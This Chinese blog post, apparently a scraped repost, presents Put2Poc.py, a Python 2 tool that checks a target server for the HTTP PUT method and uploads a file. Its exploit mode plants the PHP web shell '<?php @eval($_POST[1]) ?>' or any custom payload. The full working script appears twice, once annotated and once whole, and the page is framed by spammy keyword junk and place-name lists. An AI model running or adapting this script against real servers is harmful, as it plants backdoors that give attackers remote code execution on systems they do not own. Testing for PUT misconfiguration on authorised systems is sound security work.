91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

PUT上傳POC--Put2Poc.py

發布時間:2020-06-16 18:33:59 來源:網絡 閱讀:1707 作者:nw01f 欄目:安全技術

環境

Python 2.7 
    requests
    sys
Windows 7
Apache 已完成put配置。
PHP

Apache PUT配置

簡單介紹一下源碼,增加易讀性。

POC入口函數,設置默認變量,接受和判斷用戶輸入參數是否合法,調用探測是否存在不安全的HTTP方法函數Test2Option(url,YN),接受返回所支持的方法,調用PUT方法上傳文件。
def main():
    if len(sys.argv) < 2 :
        print u'''
    Version:1.0
    請輸入將要驗證的URL(eg:Put2Poc.py http://test.com)
    Put2Poc.py arg1 arg2
    arg1:目標URL
    arg2: 選擇(1)驗證OR(2)利用(默認為驗證)
    arg3: 選擇上傳文件的目錄,默認為/(eg:/test/)
    arg4: 設置長傳的文件的文件名,默認為test.html
    arg5:設置特定的利用payload(默認漏洞利用為:<?php @eval($_POST[1]) ?>)
    注:當前版本僅支持PHP語言的利用'''
        sys.exit()
    if len(sys.argv) >= 2 :
        url = sys.argv[1]
        YN = 1
        path = '/'
        filename = 'test.html' 
        content = None
        # print url
        if 'http' not in url :
            print u'請輸入協議HTTP/HTTPS(eg:Put2Poc.py http://test.com)'
            sys.exit()
        if len(sys.argv) >= 3 :
            # print type(sys.argv[2])
            if sys.argv[2] in '2' :
                filename = 'test.php'
            if sys.argv[2] not in ['1','2'] :
                print u'輸入的設置有誤,請選擇正確的設置(1:驗證|2:利用)'
                sys.exit()
            YN = sys.argv[2]
        if len(sys.argv) >= 4 :
            path = sys.argv[3]
        if len(sys.argv) >= 5 :
            filename = sys.argv[4]
        if len(sys.argv) >= 6 :
            content = sys.argv[5]
    if len(sys.argv) > 6 :
        print u'請檢查參數設置'
        sys.exit()
    r_options = Test2Option(url,YN)
    if content is not None :
        Put2File(url,YN,r_options,path,filename,content)
    else:
        Put2File(url,YN,r_options,path,filename)
    # print r_options
Error2status(code) 判斷請求的返回狀態。
參數 code : 請求返回的狀態碼
def Error2status(code):
    if 400 <= code < 500:
        return 4
    if 500 <= code < 600 :
        return 5
    if 200 <= code < 400 :
        return True
Test2Option(url,YN)探測目標URL是否支持OPTIONS方法
參數 url : 請求的URL
參數 YN : 選擇驗證漏洞或者利用漏洞,默認為驗證。
def Test2Option(url,YN):
    try:
        r = requests.options(url,verify=False,timeout=10)
    except :
        print u'Error,請檢查鏈接是否可以訪問'
        sys.exit()
    r_options = r.headers
    r_status_code = Error2status(r.status_code)
    if r_status_code == 4 :
        print u'%s Client Error for url: %s' % (r.status_code,url)
        print u'該鏈接不支持OPTIONS方法'
        sys.exit()
    if r_status_code == 5 :
        print u'%s Server Error for url: %s' % (r.status_code,url)
        print u'請檢查鏈接是否可以訪問'
        sys.exit()
    if r_status_code is True :
        print u'該鏈接存在不安全的HTTP方法'
        print r_options['Allow']
        return r_options['Allow']
Put2File(url,YN,r_options,path,filename,content=None)
參數 url : 測試的URL
參數 YN : 選擇驗證漏洞或者利用漏洞,默認為驗證。
參數 r_options : 網站所支持的HTTP請求方法。
參數 path : 文件上傳位置
參數 filename : 文件名
參數 content : 自定義文件內容。
def Put2File(url,YN,r_options,path,filename,content=None):
    url = url.rstrip('/') + path + filename
    print url
    headers = {
    'Accept': '*/*',
    'Accept-Language': 'en-US',
    'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Win32)'   
    }
    data = '<script>alert(1)</script>'
    if YN is '2':
        data = '<?php @eval($_POST[1]) ?>'
        if content is not None :
            data = content
    r = requests.put(url,headers=headers,data=data)
    r_status_code = Error2status(r.status_code)
    if r_status_code == 4 :
        print u'%s Client Error for url: %s' % (r.status_code,url)
        print u'服務器禁止上傳文件'
    if r_status_code == 5 :
        print u'%s Server Error for url: %s' % (r.status_code,url)
        print u'服務器禁止上傳文件'
    if r_status_code is True :
        print u'Server status code: %s' %(r.status_code)
        print u'服務器支持PUT文件上傳'
        print u'文件名: %s' %(filename)
        print u'文件內容: %s' %(data)
        print u'文件長傳位置為: %s' %(path)
        print u'文件鏈接: %s' %(url)
        print r.content

POC

#/usr/bin/env python
#coding:utf-8
#
#Author:nw01f
#Date:2018.01.11
#Version:1.0
#

import requests
import sys

def Error2status(code):
    if 400 <= code < 500:
        return 4
    if 500 <= code < 600 :
        return 5
    if 200 <= code < 400 :
        return True

def Test2Option(url,YN):
    try:
        r = requests.options(url,verify=False,timeout=10)
    except :
        print u'Error,請檢查鏈接是否可以訪問'
        sys.exit()
    r_options = r.headers
    r_status_code = Error2status(r.status_code)
    if r_status_code == 4 :
        print u'%s Client Error for url: %s' % (r.status_code,url)
        print u'該鏈接不支持OPTIONS方法'
        sys.exit()
    if r_status_code == 5 :
        print u'%s Server Error for url: %s' % (r.status_code,url)
        print u'請檢查鏈接是否可以訪問'
        sys.exit()
    if r_status_code is True :
        print u'該鏈接存在不安全的HTTP方法'
        print r_options['Allow']
        return r_options['Allow']

def Put2File(url,YN,r_options,path,filename,content=None):
    url = url.rstrip('/') + path + filename
    print url
    headers = {
    'Accept': '*/*',
    'Accept-Language': 'en-US',
    'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Win32)'   
    }
    data = '<script>alert(1)</script>'
    if YN is '2':
        data = '<?php @eval($_POST[1]) ?>'
        if content is not None :
            data = content
    r = requests.put(url,headers=headers,data=data)
    r_status_code = Error2status(r.status_code)
    if r_status_code == 4 :
        print u'%s Client Error for url: %s' % (r.status_code,url)
        print u'服務器禁止上傳文件'
    if r_status_code == 5 :
        print u'%s Server Error for url: %s' % (r.status_code,url)
        print u'服務器禁止上傳文件'
    if r_status_code is True :
        print u'Server status code: %s' %(r.status_code)
        print u'服務器支持PUT文件上傳'
        print u'文件名: %s' %(filename)
        print u'文件內容: %s' %(data)
        print u'文件長傳位置為: %s' %(path)
        print u'文件鏈接: %s' %(url)
        print r.content

def main():
    if len(sys.argv) < 2 :
        print u'''
    Version:1.0
    請輸入將要驗證的URL(eg:Put2Poc.py http://test.com)
    Put2Poc.py arg1 arg2
    arg1:目標URL
    arg2: 選擇(1)驗證OR(2)利用(默認為驗證)
    arg3: 選擇上傳文件的目錄,默認為/(eg:/test/)
    arg4: 設置長傳的文件的文件名,默認為test.html
    arg5:設置特定的利用payload(默認漏洞利用為:<?php @eval($_POST[1]) ?>)
    注:當前版本僅支持PHP語言的利用'''
        sys.exit()
    if len(sys.argv) >= 2 :
        url = sys.argv[1]
        YN = 1
        path = '/'
        filename = 'test.html' 
        content = None
        # print url
        if 'http' not in url :
            print u'請輸入協議HTTP/HTTPS(eg:Put2Poc.py http://test.com)'
            sys.exit()
        if len(sys.argv) >= 3 :
            # print type(sys.argv[2])
            if sys.argv[2] in '2' :
                filename = 'test.php'
            if sys.argv[2] not in ['1','2'] :
                print u'輸入的設置有誤,請選擇正確的設置(1:驗證|2:利用)'
                sys.exit()
            YN = sys.argv[2]
        if len(sys.argv) >= 4 :
            path = sys.argv[3]
        if len(sys.argv) >= 5 :
            filename = sys.argv[4]
        if len(sys.argv) >= 6 :
            content = sys.argv[5]
    if len(sys.argv) > 6 :
        print u'請檢查參數設置'
        sys.exit()
    r_options = Test2Option(url,YN)
    if content is not None :
        Put2File(url,YN,r_options,path,filename,content)
    else:
        Put2File(url,YN,r_options,path,filename)
    # print r_options

if __name__ == '__main__':
    main()

注:歡迎指正和提出修改意見。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

武邑县| 渭南市| 塔城市| 望城县| 松潘县| 新和县| 新平| 元谋县| 株洲县| 明水县| 肇东市| 林西县| 吉木乃县| 孟津县| 连南| 绥滨县| 罗江县| 通辽市| 当涂县| 石泉县| 宣武区| 兴山县| 沙坪坝区| 五寨县| 定远县| 神农架林区| 咸丰县| 汕头市| 郎溪县| 太和县| 喀喇沁旗| 龙井市| 临颍县| 鄢陵县| 武汉市| 合川市| 宝应县| 视频| 西乡县| 盐边县| 牡丹江市|